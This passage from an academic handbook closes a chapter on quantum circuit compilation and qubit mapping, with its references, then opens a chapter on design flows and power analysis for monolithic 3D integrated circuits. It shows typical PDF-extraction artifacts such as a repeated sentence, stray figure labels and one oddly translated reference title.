lack of efficient unitary representations complicates such approaches. Fowler (2011)
avoided this issue by conducting the breadth-first search directly, that is, without
the assistance of a pre-computed database with efficient lookup. Non-search-based
synthesis has been utilized in quantum computing on occasion. Kliuchnikov et al.
(2012) in particular provide an approach for decomposing an arbitrary single-qubit
unitary. The earlier described algorithms were largely concerned with lowering
gate counts, and any depth reduction was a byproduct of that. However, when
there are many computational resources available, it can frequently make sense to
raise complexity in order to parallelize operations to take advantage of the extra
resources, as in classical computing. However, when there are many computational
resources available, it can frequently make sense to raise complexity in order
to parallelize operations to take advantage of the extra resources, as in classical
computing. Broadbent and Kashefi (2009) develop an algorithm for translating
quantum circuits to a pattern (a computation in the measurement-based model) that
adds a number of additional ancillas linear in the number of gates. Mapping refers
to assigning logical qubits to the physical qubits of the hardware.
In the following section, mapping and optimization specifically for supercon-
ducting and trapped-ion quantum computers is discussed.
Shuttle Operation
A major hurdle in realizing large TI systems is confining many ions in a single trap
as it decreases the spacing between ions, making it challenging to pulse a qubit
using laser controllers selectively. Moreover, the gate time becomes slow, which
results in longer program execution time. Therefore, the pathway to scalability in
742 S. Upadhyay et al.
policy ensures that the compiler chooses a routing path with fewer erroneous links.
In Ash-Saki et al. (2019), the authors present QURE to schedule gate operation
to less noisy qubits intelligently, thus resulting in better fidelity of the output state.
They propose two approaches: (a) isomorphic subgraph (ISG) search and (b) greedy,
to find a better allocation of program (logical) qubits to hardware (physical) qubits.
They propose using the ISG search approach to start with an optimal depth version
of a quantum circuit and check multiple isomorphic subgraphs systematically. Each
subgraph is given an approximate success probability, and the subgraph with the
highest success probability is chosen to execute the circuit. They demonstrated that
QURE can improve correct output probability or fidelity by a large margin without
incurring any physical or circuit-level overhead in a rigorous simulation using a
model noisy quantum system and an experiment with IBM’s real quantum device.
Superconducting-Specific Work
Crosstalk Mitigation
As two gates run in parallel, the crosstalk error occurs, resulting in an increase
in gate faults of two parallel gates when compared to isolated gates. The authors
of Murali et al. (2020a) conducted extensive trials on numerous IBM devices
21 Architectures for Quantum Information Processing 745
Application-Specific Compilation
Quantum compilers typically use generic rules to optimize every given quantum
program, and they don’t take program-specific information into account while doing
aggressive optimization. There have been recent papers (Alam et al. 2020a,b,c) that
give algorithm-specific compilation approaches for QAOA, which is an outstanding
near-term algorithm. The ZZ interactions in QAOA may be accomplished with 2
CNOTs and 1 RZ operation inside a level and are commutative (Alam et al. 2020a),
i.e., these operations can be reordered without affecting the circuit’s output state.
In Alam et al. (2020a), the authors propose several QAOA-specific optimizations,
including parallelization of ZZ operations using a binary bin-packing algorithm
746 S. Upadhyay et al.
Conclusion
Acknowledgments This material is based upon work supported by NSF (CNS-1814710, DGE-
1821766, CNS-2129675, CCF-2210963, DGE-2113839, ITE-2040667), gifts from Intel, and seed
grants from Penn State ICDS and Huck Institutes of the Life Sciences.
References
Abhari AJ, Faruque A, Dousti MJ, Svec L, Catu O, Chakrabati A, Chiang C-F, Vanderwilt S, Black
J, Chong F (2012) Scaffold: quantum programming language. Technical report, Department of
Computer Science, Princeton University
Abrams DM, Didier N, Johnson BR, da Silva MP, Ryan CA (2020) Implementation of XY
entangling gates with a single calibrated pulse. Nat Electr 3(12):744–750
Alam M, Ash-Saki A, Ghosh S (2020a) Circuit compilation methodologies for quantum approx-
imate optimization algorithm. In: 2020 53rd Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 215–228
21 Architectures for Quantum Information Processing 747
Alam M, Ash-Saki A, Ghosh S (2020b) An efficient circuit compilation flow for quantum
approximate optimization algorithm. In: 2020 57th ACM/IEEE Design Automation Conference
(DAC). IEEE, pp 1–6
Alam M, Ash-Saki A, Li J, Chattopadhyay A, Ghosh S (2020c) Noise resilient compilation policies
for quantum approximate optimization algorithm. In: Proceedings of the 39th International
Conference on Computer-Aided Design, pp 1–7
Apolloni B, Cesa-Bianchi N, De Falco D (1990) A numerical implementation of “quantum
annealing”. In: Stochastic Processes, Physics and Geometry: Proceedings of the Ascona-
Locarno Conference, pp 97–111
Arute F, Arya K, Babbush R, Bacon D, Bardin JC, Barends R, Biswas R, Boixo S, Brandao FGSL,
Buell DA et al (2019) Quantum supremacy using a programmable superconducting processor.
Nature 574(7779):505–510
Ash-Saki A, Alam M, Ghosh S (2019) Qure: qubit re-allocation in noisy intermediate-scale
quantum computers. In: Proceedings of the 56th Annual Design Automation Conference 2019,
pp 1–6
Bhattacharjee D, Saki AA, Alam M, Chattopadhyay A, Ghosh S (2019) MUQUT: multi-constraint
quantum circuit mapping on NISQ computers. In: 2019 IEEE/ACM International Conference
on Computer-Aided Design (ICCAD). IEEE, pp 1–7
Broadbent A, Kashefi E (2009) Parallelizing quantum circuits. Theor Comput Sci 410(26):2489–
2510
Chatterjee A, Stevenson P, De Franceschi S, Morello A, de Leon NP, Kuemmeth F (2021)
Semiconductor qubits in practice. Nat Rev Phys 3(3):157–177
Cirac JI, Zoller P (1995) Quantum computations with cold trapped ions. Phys Rev Lett 74(20):4091
Cirq documentation. https://cirq.readthedocs.io/en/stable/
Cross AW, Bishop LS, Smolin JA, Gambetta JM (2017) Open quantum assembly language. arXiv
preprint arXiv:1707.03429
Deutsch D, Jozsa R (1992) Rapid solution of problems by quantum computation. Proc R Soc Lond
Ser A: Math Phys Sci 439(1907):553–558
Ding Y, Gokhale P, Lin SF, Rines R, Propson T, Chong FT (2020) Systematic crosstalk mitigation
for superconducting qubits via frequency-aware compilation. In: 2020 53rd Annual IEEE/ACM
International Symposium on Microarchitecture (MICRO). IEEE, pp 201–214
Farhi E, Goldstone J, Gutmann S (2014) A quantum approximate optimization algorithm. arXiv
preprint arXiv:1411.4028
Fowler AG (2011) Constructing arbitrary Steane code single logical qubit fault-tolerant gates.
Quantum Inf Comput 11(9–10):867–873
Fu P, Kishida K, Ross NJ, Selinger P (2020) A tutorial introduction to quantum circuit
programming in dependently typed proto-quipper. In: International Conference on Reversible
Computation. Springer, pp 153–168
Gambetta JM, Córcoles AD, Merkel ST, Johnson BR, Smolin JA, Chow JM, Ryan CA, Rigetti C,
Poletto S, Ohki TA et al (2012) Characterization of addressability by simultaneous randomized
benchmarking. Phys Rev Lett 109(24):240504
Green AS, Lumsdaine PL, Ross NJ, Selinger P, Valiron B (2013) Quipper: a scalable quantum pro-
gramming language. In: Proceedings of the 34th ACM SIGPLAN Conference on Programming
Language Design and Implementation, pp 333–342
Grover LK (1996) A fast quantum mechanical algorithm for database search. In: Proceedings of
the Twenty-Eighth Annual ACM Symposium on Theory of Computing, STOC’96. Association
for Computing Machinery, Philadelphia, pp 212–219
Heim B, Rønnow TF, Isakov SV, Troyer M (2015) Quantum versus classical annealing of Ising
spin glasses. Science 348(6231):215–217
Heim B, Soeken M, Marshall S, Granade C, Roetteler M, Geller A, Troyer M, Svore K (2020)
Quantum programming languages. Nat Rev Phys 2(12):709–722
Kadowaki T, Nishimori H (1998) Ricottura quantistica nel modello di Ising trasversale. Fis Rev E
58(5):5355
748 S. Upadhyay et al.
Kjaergaard M, Schwartz ME, Braumüller J, Krantz P, Wang JI-J , Gustavsson S, Oliver WD (2020)
Superconducting qubits: current state of play. Annu Rev Condens Matter Phys 11:369–395
Kliuchnikov V, Maslov D, Mosca M (2012) Fast and efficient exact synthesis of single qubit
unitaries generated by Clifford and T gates. arXiv preprint arXiv:1206.5236
Lanzagorta M, Uhlmann J (2009) Quantum computer science. Morgan and Claypool Publishers.
ISBN:9781598297324
Li G, Ding Y, Xie Y (2019) Tackling the qubit mapping problem for NISQ-Era quantum devices.
In: Proceedings of the Twenty-Fourth International Conference on Architectural Support for
Programming Languages and Operating Systems, pp 1001–1014
Li G, Wu A, Shi Y, Javadi-Abhari A, Ding Y, Xie Y (2021) On the co-design of quantum
software and hardware. In: Proceedings of the Eight Annual ACM International Conference
on Nanoscale Computing and Communication, pp 1–7
McCaskey AJ, Lyakh DI, Dumitrescu EF, Powers SS, Humble TS (2020) Xacc: a system-level
software infrastructure for heterogeneous quantum–classical computing. Quantum Sci Technol
5(2):024002
Montanaro A (2016) Quantum algorithms: an overview. In: NPJ Quantum Information, vol 2, p 1
Morita S, Nishimori H (2008) Mathematical foundation of quantum annealing. J Math Phys
49(12):125210
Murali P, Baker JM, Javadi-Abhari A, Chong FT, Martonosi M (2019) Noise-adaptive compiler
mappings for noisy intermediate-scale quantum computers. In: Proceedings of the Twenty-
Fourth International Conference on Architectural Support for Programming Languages and
Operating Systems, pp 1015–1029
Murali P, McKay DC, Martonosi M, Javadi-Abhari A (2020a) Software mitigation of crosstalk on
noisy intermediate-scale quantum computers. In: Proceedings of the Twenty-Fifth International
Conference on Architectural Support for Programming Languages and Operating Systems,
pp 1001–1016
Murali P, Debroy DM, Brown KR, Martonosi M (2020b) Architecting noisy intermediate-scale
trapped ion quantum computers. In: 2020 ACM/IEEE 47th Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 529–542
Nielsen MA, Chuang I (2002) Quantum computation and quantum information. American
Association of Physics Teachers
Patel T, Tiwari D (2020) DisQ: a novel quantum output state classification method on IBM
quantum computers using openpulse. In: Proceedings of the 39th International Conference
on Computer-Aided Design, pp 1–9
Peruzzo A et al (2013) A variational eigenvalue solver on a quantum processor. eprint. arXiv
preprint arXiv:1304.3061
Qiskit documentation. https://qiskit.org/documentation/
Qutip documentation. http://qutip.org/documentation.html
Reiher M, Wiebe N, Svore KM, Wecker D, Troyer M (2017) Elucidating reaction mechanisms on
quantum computers. Proc Natl Acad Sci 114(29):7555–7560
Rios F, Selinger P (2017) A categorical model for a quantum circuit description language. arXiv
preprint arXiv:1706.02630
Ross NJ (2015) Algebraic and logical methods in quantum computation. arXiv preprint
arXiv:1510.02198
Saki AA, Topaloglu RO, Ghosh S (2022) Muzzle the shuttle: efficient compilation for multi-trap
trapped-ion quantum computers. In: 2022 Design, Automation & Test in Europe Conference &
Exhibition (DATE). IEEE, pp 322–327
Santoro GE, Tosatti E (2006) Optimization using quantum mechanics: quantum annealing through
adiabatic evolution. J Phys A Math Gen 39(36):R393
Shende VV, Prasad AK, Markov IL, Hayes JP (2002) Reversible logic circuit synthesis. In:
Proceedings of the 2002 IEEE/ACM International Conference on Computer-Aided Design,
pp 353–360
Shor PW (1994) Algorithms for quantum computation: discrete logarithms and factoring. In: 35th
Annual Symposium on Foundations of Computer Science
21 Architectures for Quantum Information Processing 749
Shor PW (1999) Polynomial-time algorithms for prime factorization and discrete logarithms on a
quantum computer. SIAM Rev 41(2):303–332
Siraichi MY, Fernandes dos Santos V, Collange C, Magno Quintão Pereira F (2018) Qubit
allocation. In: Proceedings of the 2018 International Symposium on Code Generation and
Optimization, pp 113–125
Smith RS, Curtis MJ, Zeng WJ (2016) A practical quantum instruction set architecture. arXiv
preprint arXiv:1608.03355
Staq-GitHub. https://github.com/softwareqinc/staq
Steiger DS, Häner T, Troyer M (2018) Projectq: an open source software framework for quantum
computing. Quantum 2:49
Strawberry fields. GitHub. https://github.com/xanaduai/strawberryfields
Svore K, Geller A, Troyer M, Azariah J, Granade C, Heim B, Kliuchnikov V, Mykhailova M, Paz
A, Roetteler M (2018) Q# enabling scalable quantum computing and development with a high-
level DSL. In: Proceedings of the Real World Domain Specific Languages Workshop 2018,
pp 1–10
Tannu SS, Qureshi MK (2019) Not all qubits are created equal: a case for variability-aware
policies for NISQ-Era quantum computers. In: Proceedings of the Twenty-Fourth International
Conference on Architectural Support for Programming Languages and Operating Systems,
pp 987–999
tket-GitHub. https://github.com/cqcl/pytket
Trauzettel B, Bulaev DV, Loss D, Burkard G (2007) Spin qubits in graphene quantum dots. Nat
Phys 3(3):192–196
Treinish M et al (2019) Qiskit: an open-source framework for quantum computing
Wright K, Beck KM, Debnath S, Amini JM, Nam Y, Grzesiak N, Chen J-S, Pisenti NC,
Chmielewski M, Collins C et al (2019) Benchmarking an 11-qubit quantum computer. Nat
Commun 10(1):1–6
Wu X-C, Debroy DM, Ding Y, Baker JM, Alexeev Y, Brown KR, Chong FT (2021) Tilt:
achieving higher fidelity on a trapped-ion linear-tape quantum computing architecture. In: 2021
IEEE International Symposium on High-Performance Computer Architecture (HPCA). IEEE,
pp 153–166
Zulehner A (2019) Evaluating the flexibility of a* for mapping quantum circuits. In: Thomsen MK,
Soeken M (eds) Reversible computation. Springer International Publishing, Cham, pp 171–190
Zulehner A, Paler A, Wille R (2018) An efficient methodology for mapping quantum circuits to
the IBM QX architectures. IEEE Trans Comput-Aided Design Integr Circuits Syst 38(7):1226–
1236
Design and Tool Solutions for Monolithic
Three-Dimensional Integrated Circuits 22
Kyungwook Chang and Sung Kyu Lim
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 752
Monolithic 3D IC Design Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 753
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 753
Benefit Trends of Monolithic 3D ICs Across Technology Nodes . . . . . . . . . . . . . . . . . . . . 754
A Design-Aware Partitioning Approach to Monolithic 3D IC with 2D
Commercial Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 761
Power Supply Integrity of Monolithic Three-Dimensional Integrated Circuits . . . . . . . . . . . . 773
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 773
System-Level Power Delivery Network Analysis for Monolithic 3D ICs . . . . . . . . . . . . . . 774
Monolithic 3D ICs for Deep Neural Network Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 785
Motivation and Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 785
Impact of Monolithic 3D ICs on On-Chip Deep Neural Networks
Targeting Speech Recognition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 786
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 801
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 802
Abstract
K. Chang ()
Suwon, South Korea
e-mail: [email protected]
S. K. Lim
Atlanta, USA
e-mail: [email protected]
three categories: design flow, power supply integrity, and application of mono-
lithic three-dimensional integrated circuits.
In design flow, an approach to implement monolithic three-dimensional inte-
grated circuits is introduced. Power supply integrity issues of monolithic three-
dimensional stacking technology are addressed. Lastly, deep neural network
hardware using monolithic three-dimensional integrated circuits is presented as
implementing low-power and high-performance deep neural network hardware
is known to be difficult albeit they are widespread and powerful in recognition
tasks.
Keywords
Introduction
As technology scaling faces its physical limits in channel length scaling, degrading
process variations, lithography constraints, increased parasitics, and rising man-
ufacturing costs, monolithic three-dimensional (M3D) stacking technology takes
center stage in continuing Moore’s law. In M3D stacking technology, the devices
are fabricated onto multiple tiers sequentially with nanosized monolithic inter-
tier vias (MIVs), which connect the topmost metal layer of the bottom tier and
the bottommost metal layer of the top tier as shown in Fig. 1. Because MIVs
are extremely small, they can achieve much higher vertical integration density
and lower resistive-capacitive (RC) parasitics compared to through-silicon vias
(TSVs). Owing to the enhancement of fabrication technology, one can harness the
true benefit of M3D integrated circuits (ICs) with fine-grained vertical integration
(Okada et al. 2014).
bottom
tier
inter-layer
dielectric
(ILD)
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 753
The industry has transitioned from planar MOSFETs to 3D FinFETs at the 14/16 nm
node to combat worsening electrostatics and degraded short channel effects due to
channel length scaling. Improved transistor characteristics in FinFETs are achieved
at the cost of higher parasitic capacitance associated with the 3D fins and the
introduction of the local interconnects that are needed to contact the devices to
metal routing layers. Due to limited viable transistor options beyond FinFETs and
the increasing cost and complexity of lithography strategies to print sub-7 nm node
features, traditional Moore’s law scaling is slowing down. These limitations create a
technology inflection point for “More than Moore” technologies (Arden et al. n.d.)
such as M3D ICs to bring value and be adopted into mainstream designs.
To be deployed in real-word designs, M3D ICs need to be cost-effective and
deliver power or performance improvement of the order of magnitude similar to
that obtained by Moore’s law process scaling. Evaluating cost-effectiveness is
754 K. Chang and S. K. Lim
non-trivial as M3D stacking technology is still under active research and develop-
ment. Hence, the power improvement of M3D ICs in an in-order, 32-bit application
processor is evaluated while assessing whether or not that improvement is indepen-
dent of the underlying technology node.
Currently EDA tools do not support M3D ICs, and hence, previous studies
have explored implementation approaches of M3D ICs using 2D commercial tools.
In Panth et al. (n.d.), in order to estimate cell placement and wire-length of an
M3D IC, the dimensions of cells and wires are shrunk, and a shrunk-2D design
is implemented in half footprint of the 2D IC. However, using shrunk-2D designs
are prone to inaccurate buffer insertion because of inaccurate wire-load estimation
(Chang et al. 2017). Moreover, the flow is completely design-agnostic, utilizes
very large number of MIVs, and hence, partitions local cells into separate tiers
resulting in a non-optimal tier partition. Another M3D IC design flow is proposed
in Billoint et al. (2015), which folds 2D placement at the center of the die into
two separate tiers. However, using their design flow shows marginal wire-length
savings and no power savings and does not take into account design details to guide
partitioning, resulting in a non-optimal solution. Therefore, a new M3D IC design
flow is necessitated which incorporates design and micro-architecture information
during partitioning cells on multiple tiers while supporting accurate buffer insertion
with accurate wire-load estimation.
First, a comprehensive study investigating the power impact of M3D ICs across
technology nodes is presented using a commercial in-order 32-bit application
processor on foundry 28 nm, foundry 14/16 nm and 7 nm technology nodes. Based
on the observation, M3D stacking technology provides maximum power savings at
the 28 nm technology node, and the benefits improve at higher clock frequencies
with the reduction of standard cell area in addition to wire-length savings. An in-
depth analysis of the results and guidelines for M3D ICs are presented to support
the observations.
Table 1 Key metrics of foundry 28 nm, 14/16 nm, and 7 nm technology nodes used in the designs
compared to 5 nm technology node
Parameters 28 nm 14/16 nm 7 nm 5 nm
Transistor type Planar FinFET FinFET FinFET
VDD (V) 0.9 0.8 0.7 0.7
CPP (nm) 110 ∼ 120 78 ∼ 90 50 48
M1 pitch (nm) 90 64 36 30
MIV cross-section (nm) 80 × 80 40 × 40 32 × 32 28 × 28
MIV height (nm) 140 170 170 170
(LEF) files.1 The transistor models incorporate scaled channel lengths and fin-
pitches and increased fin-heights compared to previous technology nodes in order to
improve performance at lower supply voltages. Multiple threshold voltages (VT ) and
variation corners are supported in the 7 nm PDK. Process metrics such as gate pitch
and metal pitches are linearly scaled from previous technology nodes, and the design
rules are created considering lithography challenges associated with printing these
pitches. The interconnect stack is modeled based on similar scaling assumptions.
The 7 nm standard cell libraries and memory macros are designed from the scratch
and characterized using the PDK.
The M3D IC requires six metal layers on both top and bottom tiers. The MIVs
connect M6 of the bottom tier with M1 of the top tier. The size of the MIVs is
limited to be 2× the minimum via size allowed in the technology node to reduce
MIV resistance. The MIV heights take into account the fact that the MIVs need to
traverse through inter-tier dielectrics and transistor substrates to contact to M1 on
the top tier. The MIV height increases from 28 nm to 14/16 nm and 7 nm technology
nodes because of the introduction of local interconnect middle-of-line (MOL) layer
in the sub-20 nm nodes.
Since M3D IC fabrication is done sequentially, high-temperature front-end
device processing of the top tier can adversely affect the interconnects in the bottom
tier, while low-temperature processing will result in inferior top-tier transistors.
Recent work reporting low-temperature processes that achieve similar device
behavior across both tiers have been presented (Batude et al. 2015), and hence, all
implementations are done with the assumption of similar device characteristics in
both tiers.
Implementation Methodology
The standard cell libraries and memory macros for the 28 nm, 14/16 nm, and 7 nm
technology nodes are used to synthesize, place, and route the full-chip design. 2D
and M3D ICs of the application processor are implemented sweeping the target
frequency from 500 MHz to 1.2 GHz in 100 MHz increments across the three
1 Duringthe writeup of the manuscript, 7 nm academic PDK was not available, thus the need for
our own development.
756 K. Chang and S. K. Lim
technology nodes. M3D ICs are implemented using shrunk-2D design flow (Panth
et al. n.d.). Full-chip timing is met at the appropriate corners (i.e., slow corner
for setup and fast corner for hold). Power is reported at the typical corner. The
floorplan of the design is customized for each technology node to meet timing, but
kept constant during frequency sweeps. Multiple iterations of the 2D and M3D IC
floorplan are required at each node to ensure that the designs meet timing. The chip
area is fixed such that the final cell utilization is similar across technology nodes.
Fig. 2 GDS layouts of (a) 28 nm 2D, (b) 28 nm M3D, (c) 14/16 nm 2D, (d) 14/16 nm M3D, (e)
7 nm 2D, and (f) 7 nm M3D ICs of the application processor at 1.1 GHz
2 We acknowledge the contribution of ARM for their donation of a commercial 32-bir processor
architecture for this research.
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 757
where PINT is the cell internal power, and the second term describes net switching
power where Cpin and Cwire are the pin and wire capacitance in the design. rp2w is
the ratio of the pin capacitance to the wire capacitance. The primary advantage of
M3D ICs comes from wire-length reduction resulting in reduced wire capacitance
switching power dissipation. With the reduction in wires, the synthesis, place, and
route tools can also reduce the drive-strengths of the gates and buffers used to meet
the design targets leading to reduced internal power (PINT ) and pin capacitance
switching component as well. The total power reduction in an M3D IC depends
on wire-length reduction, the number of cells and cell size reduction, the ratio of
pin capacitance to wire capacitance, and net switching power to internal power in
the 2D IC.
Further extending Eq. 1, as internal power and pin capacitance depend on
standard cell area, and wire-length affects wire capacitance, M3D power savings
can be denoted as follows:
758 K. Chang and S. K. Lim
Pdyn = cell · PINT + α· rp2w · Cwire · VDD
2
· fclk + wire · α· Cwire · VDD
2
· fclk ,
(2)
where cell denotes the standard cell area saving from M3D ICs over the 2D
counterparts, and wire denotes the wire-length saving in the M3D IC. This simple
linear model gives useful insight in explaining the power saving trends across
technology nodes and frequencies.
Analysis of Trends
As can be seen from Fig. 5, at a given frequency, the wire-length saving (wire ) as
well as the standard cell area saving (cell ) is nearly the same across all the three
technology nodes.
As the clock frequency is swept, the wire-length saving (wire ) does not vary by a
large magnitude, ranging between 20% and 25% as shown in Fig. 5. However, with
increasing clock frequency, 2D ICs utilize more buffers and higher drive-strength
cells to meet timing, whereas M3D ICs can meet timing with lesser number of
buffers and lower drive-strength cells because of the wire-length saving. Hence, the
standard cell area saving (cell ) increases from 2% up to 10 ∼ 12% with increasing
frequency. With these observations, Eq. 2 is modified to denote cell as a function
of fclk in order to reflect the impact of frequency on standard cell area savings.
Pdyn = cell (fclk ) · PINT + α· rp2w · Cwire · VDD
2
· fclk + wire · α· Cwire · VDD
2
· fclk
(3)
a b
Fig. 6 Power breakdown into (a) internal power, pin capacitance switching power, wire capaci-
tance switching power, and leakage power, (b) combinational cell power, clock power, sequential
cell power, and memory power at the minimum and maximum frequencies of each technology
node. The inset plots show the power reduction of M3D ICs for each power component
Fig. 7 Wire capacitance to total capacitance ratio, and net switching power to total power ratio in
2D ICs in 28 nm, 14/16 nm, and 7 nm technology nodes
larger cells to drive the same wire-length, hence, effectively increasing rp2w . Hence,
technologies with larger transistor fanouts will benefit more from M3D ICs.
where Ctot is total capacitance (Cpin + Cwire ) of a 2D IC. At this clock frequency,
the M3D power saving does not depend on rp2w . Moreover, as discussed previously,
PINT being the dominant component of the total power, M3D power saving depends
more on cell and the ratio of internal power versus net switching power than wire
or rp2w .
Figure 6b shows power breakdown according to the type of cells. As the number
of hard macros (e.g., memory blocks) and sequential cells is fixed, the power
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 761
Table 2 Normalized iso-performance design and power metric comparison of 2D and M3D ICs
with application processor in 28 nm, 14/16 nm, and 7 nm technology nodes. All values are
normalized to corresponding 28 nm 2D parameters. Capacitance and power values are normalized
to 28 nm 2D total capacitance and 28 nm 2D total power, respectively
Parameters 28 nm 14/16 nm 7 nm 28 nm 14/16 nm 7 nm
Footprint 1×1 0.64 × 0.64 0.41 × 0.35 −51.1% −50% −54.7%
Density 1 0.899 0.803 −10.9% −8.9% −12.3%
Cell count 1 1.029 1.251 −7.8% −7.3% −9.5%
Std. cell area 1 0.32 0.085 −12.6% −7.3% −9.8%
Wire-length 1 0.649 0.437 −23.6% −22.3% −27.5%
Wire cap 0.544 0.328 0.207 −23.3% −13.1% −13.2%
Pin cap 0.456 0.378 0.205 −16.5% −9.1% −12%
Total cap 1 0.706 0.412 −20.2% −11% −12.6%
Internal power 0.443 0.278 0.136 −11.4% −7.9% −8.6%
Wire cap switching power 0.271 0.129 0.063 −21.8% −14% −12.7%
Pin cap switching power 0.227 0.148 0.062 −14.9% −10.1% −11.5%
Leakage power 0.059 0.001 0.001 −13.4% −5% −3.2%
Total power 1 0.557 0.262 −15.1% −9.9% −10.3%
consumed by these cells does not change in M3D ICs. On the other hand, power
consumed by combinational cells and clock signal can be reduced effectively in
M3D ICs utilizing lower number of buffers and using lower drive-strength cells.
Table 2 shows all the important design metrics of both 2D and M3D ICs across
foundry 28 nm, 14/16 nm, and 7 nm technology nodes at 1.1 GHz. Since 1.1 GHz
is the maximum frequency for 28 nm and 14/16 nm implementation, and the second
highest for 7 nm design, the significant standard cell area saving as well as wire-
length saving is achieved with M3D ICs.
Since the operating clock frequency is high, M3D ICs save the standard cell
area by 9.9% on average for the three implementations, resulting in the internal
power and pin capacitance switching power savings. Although the ratios of internal
power and pin capacitance switching power on 2D ICs versus M3D ICs (11.4% and
14.9% in the 28 nm designs) is smaller than wire capacitance switching power ratio
(= 21.8%), since those components account for more than 70% of the total power,
they have a bigger contribution to the total power savings.
Based on the observations in the previous section, a new methodology called “cas-
cade2D design flow” to implement M3D ICs using 2D commercial tools is presented
in this section. Cascade-2D design flow utilizes a design-aware partitioning scheme
where functional modules with very large number of connections are partitioned
into separate tiers.
762 K. Chang and S. K. Lim
a b
1) Cut
M3_TOP
2) Slide Top
Dummy Wire
M8 Tier M1_TOP
Bottom Partition Top Partition MIV M6_BOT
Bottom
Anchor
Anchor
Cell
Cell
Tier
M1 M1_BOT
Fig. 8 M3D IC design scheme of cascade-2D design flow. (a) A cascade-2D design implemen-
tation with a set of anchor cells and dummy wires which models MIVs, and (b) the equivalent
M3D IC
In this flow, MIVs are modeled as sets of anchor cells and dummy wires, which
enable to implement and optimize both top and bottom tiers simultaneously in a
2D IC. Cascade-2D design flow reduces standard cell area effectively, resulting
in significantly better power savings than shrunk-2D design flow. Experimental
results show that M3D ICs implemented with cascade-2D design flow (i.e., cascade-
2D M3D ICs) can achieve up to 4× better power savings compared to those
with shrunk-2D design flow (i.e., shrunk-2D M3D ICs), while using an order of
magnitude less MIVs. In the best-case scenario, cascade-2D M3D ICs result in 25%
higher performance at iso-power and up to 20% power reduction at iso-performance
compared to 2D ICs. Additionally, by leveraging smaller standard cells, M3D ICs
can save up to 10% die area which directly translates to reduced costs.
Figure 8 shows the “cut-and-slide” methodology of cascade-2D design flow with
sets of anchor cells and dummy wires. As can be clearly seen, the anchor cells and
dummy wires model MIVs and the cascade-2D design implementation in Fig. 8a
are functionally equivalent to the M3D IC in Fig. 8b.
Implementation Methodology
Table 3 presents a qualitative comparison of cascade-2D design flow with shrunk-2D
design flow. Figure 9 shows the flow diagram of this methodology. First, functional
blocks are partitioned into two groups, the top and bottom group, creating signals
crossing the two groups, which become MIVs in an M3D IC. Then, the location of
MIVs are determined, and lastly, a cascade-2D design is implemented with sets of
anchor cells and dummy wires in 2D space, which is equivalent to the final M3D IC.
Table 3 Qualitative comparison of cascade-2D design flow and shrunk-2D design flow
Cascade-2D design flow Shrunk-2D design flow
Support block- and gate-level M3D ICs Support only gate-level M3D ICs
Capable of handling RTL-level constraints Cannot handle RTL-level constraints
Highly flexible; can implement any Implements area-balanced min-cut algorithm
partitioning algorithm for partitioning cells
Designer has complete control over Designer controls bin-size but not actual
tier-assignment of cells/blocks tier-assignment of gates
Implements top and bottom tier in a single Implements top and bottom tier separately
design
Buffer insertion based on actual technology Buffer insertion based on shrunk technology
parameters parameters
Implement 2D design Place MIVs in bottom group Place MIV ports in each
at the same location in top partition
Extract timing path info
Implement bottom group and Route MIV ports in two
from 2D design
determine location of MIVs partitions in top view
Partition RTL into two groups
(top/bottom group) Place anchor cells
in each partition views
Because M3D ICs offer vertical integration of cells, power and performance
improvement is achieved by placing inter-communicating functional modules sepa-
rated by a large distance in the xy-plane in a 2D IC on separate tiers and reducing
the distance by utilizing the z-axis in an M3D IC. With a detailed understanding
of the micro-architecture organization, functional modules can be pre-partitioned
into separate tiers. For example, consider two functional modules whose connecting
signals have a tight-timing budget (e.g., a data path unit and its register bank).
Placing these modules into separate tiers and connecting them with MIVs can help
reduce the wire-length.
In case it is non-trivial to partition based on the understanding of micro-
architectural organization, the design information from a 2D implementation can
be utilized to help guide the partitioning process. By extracting timing paths from
a 2D IC, the number of timing paths crossing each pair of functional modules can
be quantified, which is called “degree of connectivity” between functional modules.
764 K. Chang and S. K. Lim
a b
3 Timing paths crossing two group: 11
Top 2
A 2
C E A (Fixed) D F
group 3 1 1 4
Critical 1 4 2
Bottom
1 2
B D F group B (Fixed) C E
Fig. 10 An example of the design-aware partitioning scheme of cascade-2D design flow. (a) Pre-
partitioned modules (yellow box), and degree of connectivity (numbers on the arrows) of rest of
modules (green box). (b) Result of the design-aware partitioning
The standard cell area of each functional module is also extracted from the 2D IC
to balance cell area between the tiers.
After obtaining the degree of connectivity of functional modules and their cell
area, the design is partitioned into two groups based on the following criteria:
These criteria help (1) the functional blocks, which have a very high degree of
connectivity, be placed onto separate tiers and minimize the distance between them,
and (2) balance the standard cell area of the two tiers. Figure 10 shows an example
of design-aware partitioning. Modules A and B are fixed on two different groups
based on organization of the design micro-architecture, modules C, D, E, and F
are partitioned maximizing the number of timing paths crossing two groups and
balancing cell area of two groups. However, cascade-2D design flow is extremely
flexible and can incorporate any number of constraints for partitioning cells or
